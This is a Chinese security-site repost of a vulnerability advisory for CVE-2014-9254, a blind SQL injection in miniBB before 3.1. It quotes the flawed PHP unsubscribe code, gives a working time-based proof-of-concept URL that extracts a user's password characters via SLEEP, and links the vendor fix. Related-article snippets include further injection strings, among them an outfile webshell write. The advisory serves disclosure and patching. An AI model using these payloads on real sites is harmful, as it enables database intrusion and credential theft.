安科网

miniBB “code” SQL注入漏洞

CarolWang

CarolWang

2014-12-23

关注 关注

发布日期:2014-12-19
更新日期:2014-12-23

受影响系统:
MiniBB MiniBB < 3.1
描述:
CVE(CAN) ID: CVE-2014-9254

 MiniBB是独立的、开源的网络论坛构造程序。

MiniBB 3.1之前版本,当"action"设置为"unsubscribe"后,没有正确过滤bb_func_unsub.php的"code"参数值,攻击者通过注入任意SQL代码,利用此漏洞可操纵SQL查询。

<*来源:Kacper Szurek
 
  链接:http://secunia.com/advisories/61794/
 *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# Exploit Title: miniBB 3.1 Blind SQL Injection
 # Date: 23-11-2014
 # Software Link: http://www.minibb.com/
 # Exploit Author: Kacper Szurek
 # Contact: http://twitter.com/KacperSzurek
 # Website: http://security.szurek.pl/
 # CVE: CVE-2014-9254
 # Category: webapps

 1. Description
   
 preg_match() only check if $_GET['code'] contains at least one letter or digit (missing ^ and $ inside regexp).

 File: bb_func_unsub.php
 $usrid=(isset($_GET['usrid'])?$_GET['usrid']+0:0);

 $allowUnsub=FALSE;
 $chkCode=FALSE;

 if(isset($_GET['code']) and preg_match("#[a-zA-Z0-9]+#", $_GET['code'])){
    //trying to unsubscribe directly from email
    $chkField='email_code';
    $chkVal=$_GET['code'];
    $userCondition=TRUE;
    $chkCode=TRUE;
 }
 else{
    //manual unsubsribe
    $chkField='user_id';
    $chkVal=$user_id;
    $userCondition=($usrid==$user_id);
 }

 if ($topic!=0 and $usrid>0 and $userCondition and $ids=db_simpleSelect(0, $Ts, 'id, user_id', 'topic_id', '=', $topic, '', '', $chkField, '=', $chkVal))

http://security.szurek.pl/minibb-31-blind-sql-injection.html
   
 2. Proof of Concept

http://minibb-url/index.php?action=unsubscribe&usrid=1&topic=1&code=test' UNION SELECT 1, IF(substr(user_password,1,1) = CHAR(99), SLEEP(5), 0) FROM minibbtable_users WHERE user_id = 1 AND username != '

 This SQL will check if first password character user ID=1 is &#147;c&#148;.

 If yes, it will sleep 5 seconds.
   
 3. Solution:
   
http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html

建议:
厂商补丁:

MiniBB
 ------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:


MiniBB:
http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html

 Kacper Szurek:
http://security.szurek.pl/minibb-31-blind-sql-injection.html

sql注入 sql注入攻击

CarolWang

CarolWang

0 关注 0 粉丝 0 动态

关注 关注

相关推荐

sql注入 --显错注入

jiong 2020-09-17

防止SQL注入的一些解决方法

-----解决方案--------------------------------------------------------过滤URL中的一些特殊字符,动态SQL语句使用PrepareStatement..------解决方案------------

ALiDan 2020-07-27

web安全pikachu靶场之SQL注入

数据库注入漏洞,主要是开发人员在构建代码时, 没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一-种漏洞。在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一

一对儿程序猿 2020-07-04

第三天--注入攻击:Web安全之SQL注入漏洞专题

第三天--注入攻击:Web安全之SQL注入漏洞专题。SQL手工注入上节课就讲过了,简单复习下。使用union联合查询数据库,数据表,字段以及字段信息。Sqlmap.py –u URL –p 具体参数。结合Burpsuite读取日志文件。Burp提取HTTP

godfather 2020-06-13

StringEscapeUtils的常用使用,防止SQL注入及XSS注入

StringBuffer sql = new StringBuffer("select key_sn,remark,create_date from tb_selogon_key where 1=1 "); if(!

ItBJLan 2020-06-11

企业检测SQL注入的一些方式探讨

在企业中有如下几种方式可以选择;最开始使用的是Seay源代码审计工具,后面使用的是Rips代码审计工具,发现都不能满足自己的需求,因为有个致命缺陷,就是会有遗漏的SQL注入找不全。Taint这种参数污染标记跟踪的工具又会比Rips的准确率高。Taint总会

qshpeng 2020-05-11

简述sql注入漏洞

在写与数据库交互的语句时,直接将用户输入的数据跟sql语句进行拼接,没有过滤内容,导致用户可以修改整条语句的结构,产生不同的数据库操作语句,没有经过任何的过滤就直接放入数据库引擎执行。sql注入的危害,一直排行在owasp排行榜的top10高居不下,其危害

liuyang000 2020-04-20

SQL注入攻击与防范

  SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来欺骗数据库服务器执行非授权的任意查询,从而进一步获取相应的数据信

一对儿程序猿 2020-04-20

【转】SQL 注入攻击

select * from [表名] where id = ‘1‘;1审查元素,并利用 f5 刷新页面。id=1 后加入一个 单引号,构成。id=1 and 1=11这相当于 SQL 查询语句:。select select * from 表名 where

wkwanglei 2020-03-27

Axublog 1.1.0 c_login.php存在sql注入漏洞

Axublog是一款PHP个人博客系统。Axublog存在SQL注入漏洞。攻击者可利用漏洞, 直接进行注入,获取数据库敏感信息。继续跟踪登录验证函数, jsloginpost 。jsloginpost 方法定义在文件 www/ad/c_login.php

gwn00 2020-03-01

php如何防止SQL注入

通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。在用户名输入框中输入:‘ or 1=1#,密码随便输入,这时候的合成后的SQL查询语句为#在mysql中是注释符,这样井号后面的内容将被mysql

gwn00 2020-02-14

Dapper 封装02-组装SQL

在 SQLSERVER 里,我们在执行命令的时候我们是可以进行参数化传递的。这个好处主要可以防止注入。我们正常写一个 Where 语句,比如WHERE Age=23 and name like ‘%delaywu%‘。从这句话中我们知道一个where 表达

qshpeng 2020-07-26

SQL注入相关知识整理

哪里存在SQL注入?任何客户端可控,传递到服务器的变量,并且和数据库进行交互,都有可能存在sql注入。文件名必须全路径,SELECT ‘<?php phpinfo(); ?>’ into outfile ‘c:\Windows\tmp\1.ph

世樹 2020-07-17

面试准备季——MyBatis 面试专题(含答案)

写在前面:2020年面试必备的Java后端进阶面试题总结了一份复习指南在Github上,内容详细,图文并茂,有需要学习的朋友可以Star一下!程序员直接编写原生态 sql,可以严格控制 sql 执行性能,灵活度高。MyBatis 可以使用 XML 或注解来

chenjiazhu 2020-07-08

Django JSONField/HstoreField SQL注入(CVE-2019-14234)

在IDEA中创建个Django项目,打开已安装的包,发现Django版本已经是2.4,没有该漏洞了,于是修改一下,这里因为python2 是不支持Django,2.x版本的,所以这里用的python3,其实IDEA中venv很好配置。alter user

明月清风精进不止 2020-06-13

MyBatis中的$和#,用不好,准备走人!

2、${ }是字符串替换, MyBatis在处理${ }时,它会将sql中的${ }替换为变量的值,传入的数据不会加两边加上单引号。

tanrong 2020-06-11

dedecms cookies泄漏导致SQL漏洞 article_add.php 的解决方法

漏洞描述:dedecms的文章发表表单中泄漏了用于防御CSRF的核心cookie,同时在其他核心支付系统也使用了同样的cookie进行验证,黑客可利用泄漏的cookie通过后台验证,进行后台注入。

ALiDan 2020-06-11

一个sql盲注小工具 (Golang版)

并发,二分法判断。源码写的有点垃圾,有点乱,结果也存在一些缺失。思路大概就是先判断长度,根据长度来开启多少个协程。对于循环导包的问题,直接copy了一份,重命名了一个包。数据存在丢失,而且有些会超时,主要为了练手。

码墨 2020-06-09

JavaWeb - JDBC、各个类详解、工具类、解决sql注入

各个数据库厂商去实现这套这套接口,提供数据库驱动jar包。     我们可以使用这套接口编程,真正执行的代码是驱动jar包中的实现类。    1.复制mysql-connector-java-5.1.37-bin.jar到项目的libs目录下。Strin

世樹 2020-06-05

一次sql server实战

单引号,很明显的错误,因为是时间格式:2020-6-2,所以这里肯定是字符型的。这里出现了关键性的第一个错误:‘CAST‘ 附近有语法错误,需要 ‘AS‘。但是ANDCAST( 这样,去掉中间的空格,语法都错误了。多熟悉几个sql模板语句,在注入的时候,猜

lt云飞扬gt 2020-06-03
CarolWang

CarolWang

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号